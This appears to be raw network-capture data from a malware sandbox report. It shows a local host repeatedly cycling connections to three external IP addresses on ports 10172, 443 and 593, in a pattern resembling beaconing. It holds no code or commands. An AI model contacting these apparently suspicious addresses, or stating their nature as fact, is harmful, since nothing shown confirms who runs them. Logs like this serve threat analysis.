Dec 31, 2021 09:52:18.992566109 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:18.992666960 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:19.004597902 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:19.036638021 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:19.036881924 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:19.037839890 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:19.037942886 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:19.067188025 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:19.067219973 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:19.107145071 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:19.178678989 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:19.178709030 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:19.178790092 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:19.178818941 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:19.182581902 CET	49760	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:19.212008953 CET	10172	49760	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:19.291479111 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:19.291532040 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:19.291634083 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:19.292316914 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:19.292335987 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:19.851813078 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:19.851929903 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:19.852572918 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:19.852586985 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:19.858704090 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:19.858727932 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:19.858786106 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:19.858794928 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:20.659945965 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:20.660007954 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:20.660064936 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:20.660191059 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:20.662272930 CET	49761	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:20.662312031 CET	443	49761	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:20.838277102 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.014763117 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.014971972 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.015527964 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.191776991 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.192013025 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.192080975 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.192581892 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.221879005 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.222031116 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.368830919 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.398561001 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.398605108 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.398665905 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.863405943 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.863441944 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:21.863492966 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.863524914 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.865628004 CET	49764	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:21.978523970 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.007643938 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.007872105 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.008668900 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.037527084 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.037744045 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.037920952 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.038755894 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.041873932 CET	593	49764	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:22.044217110 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.044246912 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.073165894 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.073194981 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.110452890 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.185785055 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.185805082 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.186204910 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.188246012 CET	49765	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:22.217012882 CET	10172	49765	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:22.306539059 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:22.306591034 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:22.306844950 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:22.308067083 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:22.308101892 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:22.914752007 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:22.914879084 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:22.915522099 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:22.915539980 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:22.921499968 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:22.921529055 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:22.921638012 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:22.921646118 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:23.761141062 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:23.761231899 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:23.761343002 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:23.761404991 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:23.834693909 CET	49768	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:23.834739923 CET	443	49768	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:24.168309927 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:24.342436075 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:24.342586040 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:24.346565962 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:24.520543098 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:24.520819902 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:24.520971060 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:24.521687984 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:24.527148962 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:24.527200937 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:24.695758104 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:24.701222897 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:24.701248884 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:24.701260090 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:25.166053057 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:25.166079998 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:25.166176081 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:25.166215897 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:25.265103102 CET	49770	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:25.439224958 CET	593	49770	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:25.467637062 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.496337891 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.496433020 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.497246981 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.525862932 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.526145935 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.526217937 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.527007103 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.530582905 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.530693054 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.559165955 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.559190989 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.559202909 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.671075106 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.671102047 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.671220064 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.671248913 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.675079107 CET	49771	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:25.703603029 CET	10172	49771	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:25.799330950 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:25.799406052 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:25.799503088 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:25.800199032 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:25.800230980 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:26.360204935 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:26.360354900 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:26.419357061 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:26.419397116 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:26.424007893 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:26.424031019 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:26.424098969 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:26.424113035 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:27.231127024 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:27.231199980 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:27.231342077 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:27.234335899 CET	49772	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:27.234358072 CET	443	49772	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:27.386388063 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:27.590452909 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:27.590584040 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:27.591273069 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:27.795193911 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:27.795290947 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:27.795383930 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:27.795871019 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:27.800281048 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:27.800427914 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:27.999838114 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:28.004158020 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:28.004261971 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:28.004281044 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:28.004296064 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:28.472769976 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:28.472800970 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:28.472856998 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:28.472883940 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:28.475684881 CET	49773	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:28.588748932 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.619452953 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.619574070 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.620277882 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.650945902 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.651282072 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.651350975 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.651861906 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.656997919 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.657155991 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.681052923 CET	593	49773	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:28.686090946 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.686120987 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.686137915 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.797293901 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.797321081 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.797508001 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.797559977 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.800589085 CET	49774	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:28.829540968 CET	10172	49774	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:28.917601109 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:28.917648077 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:28.917752981 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:28.918468952 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:28.918481112 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:29.522216082 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:29.522334099 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:29.523252010 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:29.523262024 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:29.529360056 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:29.529371023 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:29.529479980 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:29.529486895 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:30.363636971 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:30.363698959 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:30.363733053 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:30.363759995 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:30.367638111 CET	49775	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:30.367666960 CET	443	49775	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:30.526465893 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:30.701522112 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:30.701756001 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:30.702469110 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:30.878238916 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:30.878492117 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:30.878550053 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:30.879003048 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:30.883338928 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:30.883373976 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:31.053533077 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:31.058051109 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:31.058162928 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:32.319143057 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:32.319191933 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:32.319338083 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:32.322947025 CET	49776	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:32.435185909 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.464150906 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.464294910 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.465065002 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.494122028 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.494828939 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.494944096 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.495589018 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.498054981 CET	593	49776	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:32.501270056 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.501400948 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.530148029 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.530174017 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.570319891 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.641828060 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.641853094 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.642047882 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.642107010 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.645006895 CET	49777	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:32.675895929 CET	10172	49777	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:32.760643005 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:32.760682106 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:32.761285067 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:32.761375904 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:32.761385918 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:33.343077898 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:33.343348980 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:33.344022036 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:33.344033003 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:33.354322910 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:33.354347944 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:33.354487896 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:33.354499102 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:34.173553944 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:34.173614979 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:34.173690081 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:34.174952984 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:34.178093910 CET	49778	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:34.178129911 CET	443	49778	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:34.294501066 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:34.489821911 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:34.489938021 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:34.490466118 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:34.686291933 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:34.686326027 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:34.686408997 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:34.686969042 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:34.690879107 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:34.690954924 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:34.882096052 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:34.885615110 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:34.885963917 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:34.885991096 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:35.351747036 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:35.351767063 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:35.351876020 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:35.351931095 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:35.354784966 CET	49779	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:35.466589928 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.495657921 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.495783091 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.496433973 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.525306940 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.525532007 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.525608063 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.526293039 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.530975103 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.531071901 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.550223112 CET	593	49779	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:35.564048052 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.564064026 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.602416039 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.676466942 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.676487923 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.676562071 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.680109024 CET	49780	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:52:35.709005117 CET	10172	49780	46.101.175.170	192.168.2.7
Dec 31, 2021 09:52:35.792902946 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:35.792953014 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:35.793086052 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:35.793802023 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:35.793819904 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:36.441905022 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:36.442095041 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:36.442672968 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:36.442701101 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:36.449384928 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:36.449420929 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:36.449542046 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:36.449553967 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:37.302865982 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:37.302926064 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:37.302961111 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:37.302998066 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:37.306328058 CET	49781	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:52:37.306351900 CET	443	49781	103.9.36.172	192.168.2.7
Dec 31, 2021 09:52:37.481209993 CET	49783	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:37.671607018 CET	593	49783	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:37.671700954 CET	49783	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:37.672264099 CET	49783	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:37.864103079 CET	593	49783	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:37.864206076 CET	593	49783	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:37.867742062 CET	49783	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:37.868346930 CET	49783	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:37.873461962 CET	49783	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:37.873624086 CET	49783	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:38.058701992 CET	593	49783	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:38.063677073 CET	593	49783	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:38.064039946 CET	593	49783	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:38.530066967 CET	593	49783	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:38.530091047 CET	593	49783	103.70.29.126	192.168.2.7
Dec 31, 2021 09:52:38.530153990 CET	49783	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:52:38.532445908 CET	49783	593	192.168.2.7	103.70.29.126
